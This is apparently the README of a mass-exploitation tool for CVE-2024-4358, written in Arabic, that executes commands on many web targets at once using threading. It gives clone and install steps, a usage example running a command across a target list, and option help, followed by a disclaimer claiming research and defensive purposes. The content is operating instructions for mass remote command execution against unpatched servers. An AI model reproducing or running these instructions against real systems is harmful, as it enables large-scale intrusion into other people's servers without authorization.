
أداة استغلال جماعي لثغرة CVE-2024-4358، تنفّذ الأوامر على أهداف ويب متعددة في وقت واحد مع دعم الخيوط (threading).
أدوات معدّلة من @sinsinology لتنفيذ استغلال جماعي.

git clone https://github.com/Sk1dr0wz/CVE-2024-4358_Mass_Exploit.git
cd CVE-2024-4358_Mass_Exploit
pip intstall -r requirements.txt
usage: python CVE-2024-4358.py --target-file targets.txt -c "whoami > C:\pwned.txt" --threads 10
options:
-h, --help show this help message and exit
--target-file TARGET_FILE, -tf TARGET_FILE
File containing target IPs and ports (one per line, e.g: http://192.168.1.1:83)
--command COMMAND, -c COMMAND
Command to execute
--threads THREADS, -th THREADS
Number of threads to use (max: 100)
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، ولا يُقصد به استخدامه لمهاجمة الأنظمة إلا عند التصريح بذلك صراحةً. لا يتحمل القائمون على المشروع المسؤولية أو التبعات الناتجة عن إساءة استخدام البرنامج. استخدمه بمسؤولية.